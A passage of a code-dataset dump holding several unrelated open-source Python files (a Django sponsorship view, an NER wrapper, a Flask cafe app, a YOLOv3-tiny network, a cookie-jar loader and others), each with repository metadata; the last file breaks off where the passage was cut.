\"POST\":\n form = SponsorshipsForUserForm(request.POST, hackathon=hackathon)\n if form.is_valid():\n user = form.cleaned_data['user']\n sps = form.cleaned_data['sponsorships']\n user.sponsorships.clear()\n for sp in sps:\n user.sponsorships.add(sp)\n user.save()\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"hackathons:sponsorships:for_user\", h_pk=h_pk, user_pk=user.pk)\n else:\n initial = {\"user\": user, \"sponsorships\": Sponsorship.objects.filter(hackathon=hackathon, organizer_contacts=user)}\n form = SponsorshipsForUserForm(initial=initial, hackathon=hackathon)\n return render(request, \"sponsorships_for_user_modify.html\", {\"form\": form, \"user\": user})\n","repo_name":"fuseumass/hackerforce","sub_path":"hackathons/views/sponsorships.py","file_name":"sponsorships.py","file_ext":"py","file_size_in_byte":11727,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"82"} +{"seq_id":"73136076747","text":"from .model import Model\nfrom .globals import tag2label,label2tag\nimport pickle\nimport asyncio\nimport numpy as np\nimport string\nimport torch\nimport os\n\n__all__ = ['ModelWrapper']\n\n\nclass ModelWrapper:\n def __init__(self,\n args):\n self.word2id = self.read_dictionary(args.vocab_path)\n args.word_size = len(self.word2id)\n args.label_size = len(tag2label)\n\n self._use_cuda = args.use_cuda\n if self._use_cuda and not torch.cuda.is_available():\n self._use_cuda = False\n self._device = torch.device('cuda' if self._use_cuda else 'cpu')\n\n self._model = Model(args)\n if self._use_cuda:\n self._model.load_state_dict(torch.load(args.save))\n else:\n self._model.load_state_dict(torch.load(args.save,map_location='cpu'))\n\n\n if self._use_cuda:\n self._model.to(self._device)\n\n self._model.eval()\n \n async def startup(self,app):\n pass\n \n def read_dictionary(self,vocab_path):\n \"\"\"\n\n :param vocab_path:\n :return:\n \"\"\"\n vocab_path = os.path.join(vocab_path)\n with open(vocab_path, 'rb') as fr:\n word2id = pickle.load(fr)\n print('vocab_size:', len(word2id))\n return word2id\n \n def encode_query(self,query):\n sents = []\n \n sent_ = list(query.strip())\n # print(sent_)\n sentence_id = []\n for word in sent_:\n if word.isdigit():\n word = ''\n # elif ('\\u0041' <= word <= '\\u005a') or ('\\u0061' <= word <= '\\u007a'):\n # word = ''\n if word not in self.word2id:\n word = ''\n sentence_id.append(self.word2id[word])\n \n sents.append(sentence_id)\n # print(sents)\n seq_len_list = [len(inst) for inst in sents]\n sents = np.array(sents)\n\n with torch.no_grad():\n inst_data_tensor = torch.from_numpy(sents)\n seq_len = torch.LongTensor(seq_len_list)\n \n if self._use_cuda:\n\n inst_data_tensor = inst_data_tensor.cuda()\n seq_len = seq_len.cuda()\n\n return inst_data_tensor,seq_len\n\n def decode_pre(self,pred):\n _tags = [label2tag[tag] for tag in pred]\n res = {}\n for i in range(len(_tags)):\n tag = _tags[i].split('_')\n if 'B' in tag:\n label = tag[1].lower()\n if label not in res:\n res[label] = []\n res[label].append([i,i+1])\n for j in range(i+1,len(_tags)):\n itag = _tags[j].split('_')\n if itag[0] == 'I' and itag[1] == tag[1]:\n res[label][-1][1] = j + 1\n i = j + 1\n else:\n res[label][-1][1] = j\n break\n return res\n\n\n \n async def predict(self,query):\n word,seq_len = self.encode_query(query)\n with torch.no_grad():\n pred = self._model.predict(word,seq_len)\n decode = self.decode_pre(pred.numpy()[0]) \n res = {}\n for k in decode:\n res[k] = []\n for name in 
decode[k]:\n res[k].append(query[name[0]:name[1]])\n print('res',pred.numpy()[0],res)\n return res\n","repo_name":"feliciaren/NER","sub_path":"ner-service/nermodel/model_wrapper.py","file_name":"model_wrapper.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"34558771211","text":"#! /usr/bin/env python\n\nimport time\nimport argparse\n\nimport pandas\n\nimport pyniverse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--input_file\",\n required=True,\n help=\"the csv file downloaded from the Zooniverse containing all the classifcations done to date\",\n )\n parser.add_argument(\n \"--output_stem\",\n default=\"test\",\n help=\"the first part of each of the output files\",\n )\n parser.add_argument(\n \"--from_date\",\n default=False,\n help=\"if required, a date after which any graph will be plotted. ISO format e.g. 2017-04-07\",\n )\n parser.add_argument(\n \"--to_date\",\n default=False,\n help=\"if required, a date before which any graph will be plotted. ISO format e.g. 2017-04-07 \",\n )\n parser.add_argument(\n \"--timings\",\n action=\"store_true\",\n default=False,\n help=\"print the time taken for each step\",\n )\n parser.add_argument(\n \"--private_project\",\n action=\"store_true\",\n default=False,\n help=\"whether the project is private and therefore do not filter out non-live classifications\",\n )\n options = parser.parse_args()\n\n print(\"Reading classifications from CSV file...\")\n start = time.time()\n if options.private_project:\n current_classifications = pyniverse.Classifications(\n zooniverse_file=options.input_file,\n from_date=options.from_date,\n to_date=options.to_date,\n live_rows=not (options.private_project),\n )\n else:\n current_classifications = pyniverse.Classifications(\n zooniverse_file=options.input_file,\n from_date=options.from_date,\n to_date=options.to_date,\n )\n if options.timings:\n print(\"%.1f seconds\" % (time.time() - start))\n\n # Creating users table...\n current_classifications.create_users_table()\n\n # Plotting graphs...\n for sampling_time in [\"month\", \"week\", \"day\"]:\n current_classifications.plot_classifications_by_time(\n sampling=sampling_time,\n filename=\"graphs/\"\n + options.output_stem\n + \"-classifications-\"\n + sampling_time\n + \".pdf\",\n add_cumulative=True,\n )\n current_classifications.plot_users_by_time(\n sampling=sampling_time,\n filename=\"graphs/\"\n + options.output_stem\n + \"-users-\"\n + sampling_time\n + \".pdf\",\n add_cumulative=True,\n )\n\n current_classifications.plot_user_classification_distribution(\n filename=\"graphs/\" + options.output_stem + \"-user-distribution.pdf\"\n )\n\n print(current_classifications)\n\n # print(\"Saving PKL file...\")\n # current_classifications.save_pickle(\"dat/\"+options.output_stem+\".pkl\")\n","repo_name":"fowler-lab/pyniverse","sub_path":"bin/zooniverse-classifications-analyse.py","file_name":"zooniverse-classifications-analyse.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"} +{"seq_id":"3349993603","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf import FlaskForm\nfrom flask_bootstrap import Bootstrap5\nfrom wtforms import StringField, SubmitField, SelectField\nfrom wtforms.validators import DataRequired, URL\nimport os\n\napp = 
Flask(__name__)\n\nbootstrap = Bootstrap5(app)\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///cafes.db\"\napp.config['SECRET_KEY'] = os.environ.get(\"SECRET_KEY\")\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\nclass Cafe(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(250), unique=True, nullable=False)\n    map_url = db.Column(db.String(500), nullable=False)\n    img_url = db.Column(db.String(500), nullable=False)\n    location = db.Column(db.String(250), nullable=False)\n    seats = db.Column(db.String(250), nullable=False)\n    has_toilet = db.Column(db.Boolean, nullable=False)\n    has_wifi = db.Column(db.Boolean, nullable=False)\n    has_sockets = db.Column(db.Boolean, nullable=False)\n    can_take_calls = db.Column(db.Boolean, nullable=False)\n    coffee_price = db.Column(db.String(250), nullable=True)\n\n\nclass CafeForm(FlaskForm):\n    cafe = StringField(\"Cafe Name\", validators=[DataRequired()])\n    map_url = StringField(\"Location on Google Map (URL)\", validators=[URL(message=\"Invalid URL\")])\n    img_url = StringField(\"Image URL\", validators=[URL(message=\"Invalid URL\")])\n    location = StringField(\"Location\", validators=[DataRequired()])\n    has_sockets = SelectField(\"Has sockets\", choices=[1, 0])\n    has_toilet = SelectField(\"Has toilet\", choices=[1, 0])\n    has_wifi = SelectField(\"Has wifi\", choices=[1, 0])\n    can_take_calls = SelectField(\"Can take calls\", choices=[1, 0])\n    seats = SelectField(\"How many seats\", choices=[\"10-20\", \"20-30\", \"30-40\", \"40-50\", \"50+\"])\n    coffee_price = StringField(\"Coffee price\", validators=[DataRequired()])\n    submit = SubmitField('Submit', render_kw={'style': 'margin-top: 10px'})\n\n\n@app.route(\"/\")\ndef home():\n    cafes = Cafe.query.order_by(Cafe.id).all()\n    return render_template(\"index.html\", cafes=cafes)\n\n\n@app.route(\"/add\", methods=[\"GET\", \"POST\"])\ndef add_cafe():\n    form = CafeForm()\n    if form.validate_on_submit():\n        new_cafe = Cafe(\n            name=request.form.get(\"cafe\"),\n            map_url=request.form.get(\"map_url\"),\n            img_url=request.form.get(\"img_url\"),\n            location=request.form.get(\"location\"),\n            seats=request.form.get(\"seats\"),\n            has_toilet=int(request.form.get(\"has_toilet\")),\n            has_wifi=int(request.form.get(\"has_wifi\")),\n            has_sockets=int(request.form.get(\"has_sockets\")),\n            can_take_calls=int(request.form.get(\"can_take_calls\")),\n            coffee_price=f'£{request.form.get(\"coffee_price\")}'\n        )\n        db.session.add(new_cafe)\n        db.session.commit()\n        return redirect(url_for(\"home\"))\n    return render_template(\"add.html\", form=form)\n\n\n@app.route(\"/delete\")\ndef delete():\n    cafe_id = request.args.get('id')\n    cafe = Cafe.query.get(cafe_id)\n    db.session.delete(cafe)\n    db.session.commit()\n    return redirect(url_for(\"home\"))\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"Kaelmur/Coffee-Wifi-REST","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"10964081816","text":"def is_valid_walk(walk):\n    #determine if walk is valid\n    # set up a counter for each compass direction\n    nord = 0\n    sued = 0\n    west = 0\n    ost = 0\n    # loop over the list and check each direction\n    for direction in walk:\n        # map the valid compass directions to their counters\n        # and count upwards\n        if direction == 'n':\n            nord = nord + 1\n        elif direction == 's':\n            sued = sued + 1\n        elif direction == 'w':\n            west = west + 1\n        elif direction == 'e':\n            ost = ost + 1\n    # compute the length of the list\n    count = len(walk)\n    # prints for debugging\n    print(nord)\n    print(sued)\n    print(ost)\n    print(west)\n    print(count)\n    # check that the move counts cancel each other out,\n    # i.e. the starting point is reached again,\n    # and that the walk is not longer than 10 moves (see the kata)\n    if nord == sued and west == ost and count == 10:\n        return True\n    else:\n        return False","repo_name":"neovegeto/Codewars---my-solutions","sub_path":"Take a Ten Minutes Walk.py","file_name":"Take a Ten Minutes Walk.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}
+{"seq_id":"32642057356","text":"import logging\nfrom dataclasses import dataclass\nfrom typing import List\n\nfrom numpy import cos, sin\nfrom scipy.constants import g\n\nfrom fastoad.model_base import FlightPoint\nfrom fastoad.models.performances.mission.exceptions import FastFlightSegmentIncompleteFlightPoint\nfrom fastoad.models.performances.mission.segments.base import RegisterSegment\nfrom fastoad.models.performances.mission.segments.time_step_base import AbstractTakeOffSegment\n\n_LOGGER = logging.getLogger(__name__)  # Logger for this module\n\n# FIXME: This class is a bit awkward, because get_gamma_and_acceleration() knows\n# only the current flight point, which prevents from using the slope derivative.\n# A redefinition of the abstract class is needed.\n\n\n@RegisterSegment(\"end_of_takeoff\")\n@dataclass\nclass EndOfTakeoffSegment(AbstractTakeOffSegment):\n    \"\"\"\n    Computes a flight path segment where altitude is modified with constant pitch angle.\n    As a result, the slope angle and angle of attack are changing through time.\n    Updates are based on longitudinal dynamics equations, simplified with the assumption\n    of constant pitch angle.\n\n    .. 
note:: **Setting target**\n\n Target is an altitude and should be set to the safety altitude.\n\n \"\"\"\n\n def compute_next_flight_point(\n self, flight_points: List[FlightPoint], time_step: float\n ) -> FlightPoint:\n \"\"\"\n Computes time, altitude, speed, mass and ground distance of next flight point.\n\n :param flight_points: previous flight points\n :param time_step: time step for computing next point\n :return: the computed next flight point\n \"\"\"\n previous = flight_points[-1]\n next_point = super().compute_next_flight_point(flight_points, time_step)\n\n self.compute_next_gamma(next_point, previous)\n return next_point\n\n def complete_flight_point(self, flight_point: FlightPoint):\n \"\"\"\n Redefinition, computes data for provided flight point.\n\n Assumes that it is already defined for time, altitude, mass,\n ground distance and speed (TAS, EAS, or Mach).\n\n :param flight_point: the flight point that will be completed in-place\n \"\"\"\n flight_point.engine_setting = self.engine_setting\n\n self._complete_speed_values(flight_point)\n\n self.compute_propulsion(flight_point)\n\n # Calls modified method to add gamma_dot to flight points.\n self.get_gamma_and_acceleration(flight_point)\n\n def get_distance_to_target(\n self, flight_points: List[FlightPoint], target: FlightPoint\n ) -> float:\n current = flight_points[-1]\n\n if target.altitude is not None:\n return target.altitude - current.altitude\n\n raise FastFlightSegmentIncompleteFlightPoint(\n \"No valid target definition for altitude change.\"\n )\n\n def get_next_alpha(self, previous_point: FlightPoint, time_step: float) -> float:\n \"\"\"\n Computes angle of attack (alpha) based on gamma_dot, using constant pitch angle assumption.\n\n :param previous_point: the flight point from which next alpha is computed\n :param time_step: the duration between computed flight point and previous_point\n \"\"\"\n\n return previous_point.alpha - time_step * previous_point.slope_angle_derivative\n\n @staticmethod\n def compute_next_gamma(next_point: FlightPoint, previous_point: FlightPoint):\n \"\"\"\n Computes slope angle (gamma) based on gamma_dot\n\n :param next_point: the next flight point\n :param previous_point: the flight point from which next gamma is computed\n \"\"\"\n time_step = next_point.time - previous_point.time\n next_point.slope_angle = (\n previous_point.slope_angle + time_step * previous_point.slope_angle_derivative\n )\n\n def get_gamma_and_acceleration(self, flight_point: FlightPoint):\n \"\"\"\n Redefinition : computes slope angle derivative (gamma_dot) and x-acceleration.\n Replaces CL, CD, lift dan drag values (for ground effect and accelerated flight)\n\n :param flight_point: parameters after propulsion model has been called\n (i.e. 
mass, thrust and drag are available)\n \"\"\"\n thrust = flight_point.thrust\n mass = flight_point.mass\n airspeed = flight_point.true_airspeed\n alpha = flight_point.alpha\n gamma = flight_point.slope_angle\n\n atm = self._get_atmosphere_point(flight_point.altitude)\n\n modified_polar = self.polar_modifier.modify_polar(self.polar, flight_point)\n CL = modified_polar.cl(alpha)\n CD = modified_polar.cd(CL)\n\n drag_aero = 0.5 * atm.density * self.reference_area * airspeed ** 2 * CD\n lift = 0.5 * atm.density * self.reference_area * airspeed ** 2 * CL\n\n gamma_dot = (thrust * sin(alpha) + lift - mass * g * cos(gamma)) / mass / airspeed\n acceleration = (thrust * cos(alpha) - drag_aero - mass * g * sin(gamma)) / mass\n\n flight_point.acceleration = acceleration\n flight_point.slope_angle_derivative = gamma_dot\n flight_point.drag = drag_aero\n flight_point.lift = lift\n flight_point.CL = CL\n flight_point.CD = CD\n","repo_name":"fast-aircraft-design/FAST-OAD","sub_path":"src/fastoad/models/performances/mission/segments/registered/takeoff/end_of_takeoff.py","file_name":"end_of_takeoff.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"82"} +{"seq_id":"69870459790","text":"from cookielib import LoadError, _warn_unhandled_exception, Cookie\nimport cookielib\nimport re, time\n\n__author__ = 'danielevertsson'\n\nclass MyMozillaCookieJar(cookielib.MozillaCookieJar):\n\n def _really_load(self, f, filename, ignore_discard, ignore_expires):\n now = time.time()\n\n magic = f.readline()\n if not re.search(self.magic_re, magic):\n f.close()\n raise LoadError(\n \"The cookie does not appear to be in Netscape format. Check that the first line is:
# Netscape HTTP Cookie File\")\n\n        try:\n            while True:\n                line = f.readline()\n                if line == \"\": break\n                \n                # last field may be absent, so keep any trailing tab\n                if line.endswith(\"\\n\"): line = line[:-1]\n\n                # skip comments and blank lines XXX what is $ for?\n                if (line.strip().startswith((\"#\", \"$\")) or\n                    line.strip() == \"\"):\n                    continue\n\n                domain, domain_specified, path, secure, expires, name, value = \\\n                    line.split(\"\\t\")\n                secure = (secure == \"TRUE\")\n                domain_specified = (domain_specified == \"TRUE\")\n                if name == \"\":\n                    # cookies.txt regards 'Set-Cookie: foo' as a cookie\n                    # with no name, whereas cookielib regards it as a\n                    # cookie with no value.\n                    name = value\n                    value = None\n\n                initial_dot = domain.startswith(\".\")\n                assert domain_specified == initial_dot\n\n                discard = False\n                if expires == \"\":\n                    expires = None\n                    discard = True\n\n                # assume path_specified is false\n                c = Cookie(0, name, value,\n                           None, False,\n                           domain, domain_specified, initial_dot,\n                           path, False,\n                           secure,\n                           expires,\n                           discard,\n                           None,\n                           None,\n                           {})\n                if not ignore_discard and c.discard:\n                    continue\n                if not ignore_expires and c.is_expired(now):\n                    continue\n                self.set_cookie(c)\n\n        except IOError:\n            raise\n        except AssertionError:\n            raise AssertionError(\"Cookie does not follow Netscape format. Check that the values are separated only by tabs (\\\\t)\" + self._parse_failed_cookie_message(line))\n        except Exception as ex:\n            raise Exception(ex.message + self._parse_failed_cookie_message(line))\n\n    def _parse_failed_cookie_message(self, cookie):\n        return \"
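The subclass above re-implements _really_load so that cookies.txt lines with a missing final field or odd spacing still parse. Loading and using it works like the stock cookielib jar; a hedged usage sketch (Python 2, matching the cookielib import above; the file name is a placeholder):

    import urllib2

    jar = MyMozillaCookieJar()
    # ignore_discard/ignore_expires keep session cookies that the strict
    # loader would otherwise drop.
    jar.load('cookies.txt', ignore_discard=True, ignore_expires=True)
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
    response = opener.open('http://example.com/')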

Failed to load cookie:
%r
\" % (cookie)","repo_name":"its-dirg/oictestGui","sub_path":"src/oictestGui/my_mozilla_cookie_jar.py","file_name":"my_mozilla_cookie_jar.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"23664857635","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 21 14:18:24 2020\r\n\r\n@author: jijoj\r\n\"\"\"\r\nnumber = [1,2,3,4,5]\r\nfor x in number:\r\n if x==3:\r\n continue \r\n print(x)","repo_name":"JijoJose2002/python","sub_path":"Pythons/continue in loop.py","file_name":"continue in loop.py","file_ext":"py","file_size_in_byte":175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"35407049092","text":"# %%\nimport requests\nfrom pprint import pprint\nfrom api_keys import api_key\nimport pandas as pd\nimport time\n\n\n#Function for finding all list_name in NYT_API\ndef list_name_maker(url=\"https://api.nytimes.com/svc/books/v3/lists/names.json?\"+\"api-key=\"+api_key):\n response_=requests.get(url).json()\n result_length=response_[\"num_results\"]\n list_name=[response_[\"results\"][i][\"list_name\"] for i in range(59)]\n list_name_encoded=[response_[\"results\"][i][\"list_name_encoded\"] for i in range(59)]\n oldest_published_date=[response_[\"results\"][i][\"oldest_published_date\"] for i in range(59)]\n newest_published_date=[response_[\"results\"][i][\"newest_published_date\"] for i in range(59)]\n updated=[response_[\"results\"][i][\"updated\"] for i in range(59)]\n list_dict={\"list_name\":list_name,\n \"list_name_encoded\":list_name_encoded,\n \"oldest_published_date\":oldest_published_date,\n \"newest_published_date\":newest_published_date,\n \"updated\":updated} \n \n \n list_df=pd.DataFrame(list_dict)\n #list_df.to_csv(\"output/NYT_list.csv\",index=False)\n return list_df\n\n#list_name_df=list_name_maker()\n\n#Function for getting Best Sellers List details of one category and making a \n#dataframe and finding previous_published_date\n\ndef best_book(date='current',query='hardcover-fiction',api_key=api_key):\n url=\"https://api.nytimes.com/svc/books/v3/lists\"\n query_url = url + \"/\" + date + \"/\" + query +\".json?\"+\"api-key=\" + api_key\n resp=requests.get(query_url).json()\n num_results=len(resp[\"results\"]['books'])\n rank=[resp[\"results\"]['books'][i][\"rank\"] for i in range(num_results)]\n primary_isbn10=[resp[\"results\"]['books'][i][\"primary_isbn10\"] for i in range(num_results)]\n primary_isbn13=[resp[\"results\"]['books'][i][\"primary_isbn13\"] for i in range(num_results)]\n publisher=[resp[\"results\"]['books'][i][\"publisher\"] for i in range(num_results)]\n title=[resp[\"results\"]['books'][i][\"title\"] for i in range(num_results)]\n author=[resp[\"results\"]['books'][i][\"author\"] for i in range(num_results)]\n categry=[query for i in range(num_results)]\n pub_date=[date for i in range(num_results)]\n \n #getting previous_published_date\n previous_published_date=resp[\"results\"]['previous_published_date']\n\n category_dict={\"rank\":rank,\n \"primary_isbn10\":primary_isbn10,\n \"primary_isbn13\":primary_isbn13,\n \"publisher\":publisher,\n \"title\":title,\n \"author\":author,\n \"category\":categry,\n \"pub_date\":pub_date} \n \n return pd.DataFrame(category_dict),previous_published_date\n\n\n\n#Function for getting 28 published date and dataframes and concatenating them on 1 dataframe\ndef best_ctg_maker(query='hardcover-fiction',api_key=api_key):\n dfs=[]\n 
previous_dates=[\"current\"]\n for i in range(28):\n df=best_book(date=previous_dates[i],query=query)\n dfs.append(df[0])\n previous_dates.append(df[1])\n time.sleep(10)\n return pd.concat(dfs)\n\n\n# Function for concatenating all categories dataframes in one\ndef best_book_df_maker():\n costum_list=[\"Hardcover Fiction\",\"Hardcover Nonfiction\",\"E-Book Fiction\",\"E-Book Nonfiction\",\n \"Audio Fiction\",\"Audio Nonfiction\",\"Combined Print Fiction\",\"Combined Print Nonfiction\"]\n\n Best_books=[]\n for i in costum_list:\n df=best_ctg_maker(query=i)\n Best_books.append(df)\n time.sleep(10)\n #last dataframe concatenating \n Best_books_df=pd.concat(Best_books)\n #Best_books_df.to_csv(\"output/best_book_list.csv\",index=False)\n return Best_books_df\n\n\n\nbest_book_df_maker()","repo_name":"lalesafarzade/Best_seller_books","sub_path":"main/NYT_API.py","file_name":"NYT_API.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"72640374667","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torchsummary import summary\nfrom YoloV3.nets.yolo_basic_blocks import conv2D_BN_LeakyRelu, MaxPoolPaddedStride1\n# from DeepTools.Onnx2TRT.onnx_ternsorRT import pytorch2onnx\n\nclass YoloV3_tiny(nn.Module):\n def __init__(self, args):\n super(YoloV3_tiny, self).__init__()\n\n self.num_classes = args.num_classes\n self.num_anchors = args.num_anchors_per_resolution\n\n self.num_output_features = self.num_anchors * (4 + 1 + self.num_classes)\n\n self.conv2D_BN_LeakyRelu1 = conv2D_BN_LeakyRelu(inplanes=3, outplanes=16, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu2 = conv2D_BN_LeakyRelu(inplanes=16, outplanes=32, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu3 = conv2D_BN_LeakyRelu(inplanes=32, outplanes=64, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu4 = conv2D_BN_LeakyRelu(inplanes=64, outplanes=128, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu5 = conv2D_BN_LeakyRelu(inplanes=128, outplanes=256, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu6 = conv2D_BN_LeakyRelu(inplanes=256, outplanes=512, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu7 = conv2D_BN_LeakyRelu(inplanes=512, outplanes=1024, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu8 = conv2D_BN_LeakyRelu(inplanes=1024, outplanes=256, kernelsize=1, stride=1, padding=0)\n self.conv2D_BN_LeakyRelu9 = conv2D_BN_LeakyRelu(inplanes=256, outplanes=512, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu10 = conv2D_BN_LeakyRelu(inplanes=512, outplanes=self.num_output_features, kernelsize=1, stride=1, padding=0)\n self.conv2D_BN_LeakyRelu11 = conv2D_BN_LeakyRelu(inplanes=256, outplanes=128, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu12 = conv2D_BN_LeakyRelu(inplanes=384, outplanes=256, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu13 = conv2D_BN_LeakyRelu(inplanes=256, outplanes=self.num_output_features, kernelsize=1, stride=1, padding=0)\n\n self.MaxPoolPaddedStride1 = MaxPoolPaddedStride1()\n\n def forward(self, x):\n\n # input size = 416x416x3\n x = self.conv2D_BN_LeakyRelu1(x)\n x = nn.MaxPool2d(kernel_size=2, stride=2)(x)\n\n # 208x208x16\n x = self.conv2D_BN_LeakyRelu2(x)\n x = nn.MaxPool2d(kernel_size=2, stride=2)(x)\n\n # 104x104x32\n x = self.conv2D_BN_LeakyRelu3(x)\n x = nn.MaxPool2d(kernel_size=2, stride=2)(x)\n\n\n # 52x52x64\n x = 
self.conv2D_BN_LeakyRelu4(x)\n        x = nn.MaxPool2d(kernel_size=2, stride=2)(x)\n\n        # 26x26x128\n        y0 = self.conv2D_BN_LeakyRelu5(x)\n        x = nn.MaxPool2d(kernel_size=2, stride=2)(y0)\n\n        # 13x13x256\n        x = self.conv2D_BN_LeakyRelu6(x)\n        x = self.MaxPoolPaddedStride1(x)\n\n        # 13x13x512\n        x = self.conv2D_BN_LeakyRelu7(x)\n        # 13x13x1024\n        y1 = self.conv2D_BN_LeakyRelu8(x)\n        # 13x13x256\n        x = self.conv2D_BN_LeakyRelu9(y1)\n        # 13x13x512\n        out1 = self.conv2D_BN_LeakyRelu10(x)\n        # 13x13xnum_output_features\n\n        # 13x13x256\n        y1 = self.conv2D_BN_LeakyRelu11(y1)\n        y1 = nn.Upsample(scale_factor=2, mode=\"nearest\")(y1)\n        # 26x26x128\n        y = torch.cat(tensors=(y0, y1), dim=1)\n        # 26x26x384\n        y = self.conv2D_BN_LeakyRelu12(y)\n        # 26x26x256\n        out2 = self.conv2D_BN_LeakyRelu13(y)\n        # 26x26xnum_output_features\n\n        return out1, out2\n\n\nif __name__ == \"__main__\":\n    \"\"\" testing network \"\"\"\n    from PIL import Image\n    import argparse\n    from torchviz import make_dot\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--num-classes', type=int, default=2,\n                        help=\"number of classes\")\n    parser.add_argument('--num-anchors-per-resolution', type=int, default=3,\n                        help=\"number of anchors per output resolution\")\n\n    args = parser.parse_args()\n\n    x = torch.zeros(1, 3, 416, 416)\n    x = x.float()\n    model = YoloV3_tiny(args)\n\n    graph = make_dot(model(x))\n    graph.render('./output/net/yolov3-tiny')\n\n    # pytorch2onnx is not imported (its import is commented out above), so export via torch.onnx\n    torch.onnx.export(model, x, './output/net/yolov3_tiny.onnx', verbose=True, opset_version=11)","repo_name":"AmitNativ1984/YoloV3Distance","sub_path":"YoloV3/nets/yolov3_tiny.py","file_name":"yolov3_tiny.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"}{"seq_id":"3223469625","text":"import cv2\nimport pyautogui\n\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import image\n\nimport numpy as np\nimport os\nimport time\n\n\nCWD = os.getcwd()\nMODEL_PATH = os.path.join(CWD , \"gestures_vgg16_finetuned_multilabel.h5\")\n\nclassmodel = load_model(MODEL_PATH, compile=False)\nprint(\"Loaded Model from Disk\")\n\nisBgCaptured = False\nthreshold = 60\nlearningRate = 0\nbgModel = None\nframecount = 0\nindices = {0 : 'cool', 1 : 'fist', 2 : 'ok', 3 : 'stop', 4 : 'yo'}\n\nsecondgesture = 0\nfirstgesture = 0\nlengthgesture = 1\nexecuteflag = False\n\naltflag = False\nvolflag = False\n\ncap = cv2.VideoCapture(0)\n\ndef remove_background(frame): \n    foremask = bgModel.apply(frame, learningRate=learningRate)\n    kernel = np.ones((3, 3), np.uint8)\n    foremask = cv2.erode(foremask, kernel, iterations=1)\n    finalres = cv2.bitwise_and(frame, frame, mask=foremask)\n    return finalres\n\n\nwhile(True):\n    ret, img = cap.read()\n    img = cv2.bilateralFilter(img, 5, 50, 100)\n    img = cv2.flip(img,1)\n    img = img[100:400, 100:400]\n    cv2.imshow('Original Window', img)\n    \n    \n    \n    if isBgCaptured == True and framecount % 2 == 1:\n        frame = remove_background(img)\n        \n        grey = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n        value = (35, 35)\n        blurred = cv2.GaussianBlur(grey, value, 0)\n        _, thresh = cv2.threshold(blurred, threshold, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n        cv2.imshow(\"thresh\", thresh)\n        \n        if np.count_nonzero(thresh.astype(np.float32))/900.0 > 3.0 :\n            \n            cv2.imwrite(\"test.jpg\", thresh)\n            \n            img = image.load_img(\"test.jpg\", target_size=(224, 224), color_mode='rgb')\n            img_tensor = image.img_to_array(img)\n            img_tensor = np.expand_dims(img_tensor, axis=0)\n            img_tensor /= 255.\n            \n            prediction = 
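# A quick smoke test for the YoloV3_tiny network in yolov3_tiny.py above -- a sketch,
# not part of the original repo. SimpleNamespace stands in for the parsed argparse args,
# and num_anchors_per_resolution=3 is an assumed value.
import torch
from types import SimpleNamespace

args = SimpleNamespace(num_classes=2, num_anchors_per_resolution=3)
net = YoloV3_tiny(args)
out1, out2 = net(torch.zeros(1, 3, 416, 416))
print(out1.shape)  # coarse head: (1, 3 * (4 + 1 + 2), 13, 13)
print(out2.shape)  # fine head:   (1, 3 * (4 + 1 + 2), 26, 26)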
